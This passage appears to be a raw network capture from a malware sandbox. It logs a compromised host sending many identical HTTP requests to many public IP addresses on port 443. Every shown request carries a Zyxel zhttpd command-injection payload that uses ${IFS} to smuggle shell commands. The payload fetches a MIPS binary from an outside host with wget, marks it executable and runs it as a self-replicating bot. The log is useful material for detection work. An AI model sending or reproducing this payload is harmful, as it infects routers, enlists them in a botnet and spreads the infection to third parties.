                                                Jan 29, 2024 07:07:28.993983030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                651192.168.2.2344296205.124.189.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994021893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                652192.168.2.2352290199.31.74.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994050980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                653192.168.2.235858074.88.45.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994095087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                654192.168.2.2346746179.111.174.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994121075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                655192.168.2.2352976217.82.125.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994153976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                656192.168.2.234201851.81.34.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994200945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                657192.168.2.2347084189.241.238.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994215012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                658192.168.2.235251865.39.129.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994273901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                659192.168.2.2340840179.90.220.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994297981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                660192.168.2.234142459.79.243.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994348049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                661192.168.2.2339704198.212.11.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994381905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                662192.168.2.235740287.202.29.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994421005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                663192.168.2.233852267.84.103.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994447947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                664192.168.2.235139489.170.228.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994491100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                665192.168.2.2339808133.2.147.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994520903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                666192.168.2.2346076167.133.14.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994577885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                667192.168.2.2332934124.66.226.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994601965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                668192.168.2.2347020216.158.160.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.994626045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                669192.168.2.2349082106.2.134.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.998214006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                670192.168.2.2360934104.21.116.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.998933077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                671192.168.2.23403688.238.188.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.998971939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                672192.168.2.2358076178.54.172.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.998975992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                673192.168.2.234300670.124.22.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999003887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                674192.168.2.2350696146.11.249.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999039888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                675192.168.2.2357480190.69.16.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999068975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                676192.168.2.2360460147.206.155.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999110937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                677192.168.2.234414294.149.157.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999146938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                678192.168.2.234931099.4.36.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999167919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                679192.168.2.2348100209.8.114.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999222994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                680192.168.2.2336014191.11.180.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999273062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                681192.168.2.2351030136.195.27.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999300003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                682192.168.2.234705612.255.150.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999325991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                683192.168.2.235589843.181.155.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999330044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                684192.168.2.2335688196.28.245.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999527931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                685192.168.2.2357190172.231.131.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999625921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                686192.168.2.2354180107.35.235.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999664068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                687192.168.2.2349682112.59.154.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999700069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                688192.168.2.2353518114.149.86.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999728918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                689192.168.2.2359262208.202.149.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999789000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                690192.168.2.234175241.231.211.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999800920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                691192.168.2.2333290130.29.177.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999835968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                692192.168.2.2340372212.20.70.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999885082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                693192.168.2.234437890.248.56.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999910116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                694192.168.2.2359508120.105.253.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999932051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                695192.168.2.2349648158.227.30.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.999965906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                696192.168.2.235733477.224.108.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000025034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                697192.168.2.23451741.62.243.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000031948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                698192.168.2.2358796138.247.89.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000066996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                699192.168.2.2336566129.170.38.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000119925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                700192.168.2.2335982211.141.140.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000154018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                701192.168.2.234127827.241.126.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000179052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                702192.168.2.233423486.156.86.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000216961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                703192.168.2.2338162157.150.85.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000263929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                704192.168.2.234215418.221.103.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000293016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                705192.168.2.2352004178.253.16.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000317097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                706192.168.2.2359530148.233.136.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000365019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                707192.168.2.233713045.32.148.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.000387907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                708192.168.2.2343324137.184.51.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.967636108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                709192.168.2.2336890172.234.88.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.967694998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                710192.168.2.2349640149.154.243.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.967720985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                711192.168.2.2334600129.175.181.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.967777967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                712192.168.2.235657638.115.238.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.967845917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                713192.168.2.2351360207.4.1.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:29.967894077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                714192.168.2.235780263.113.106.127443
                                                TimestampBytes transferredDirectionData
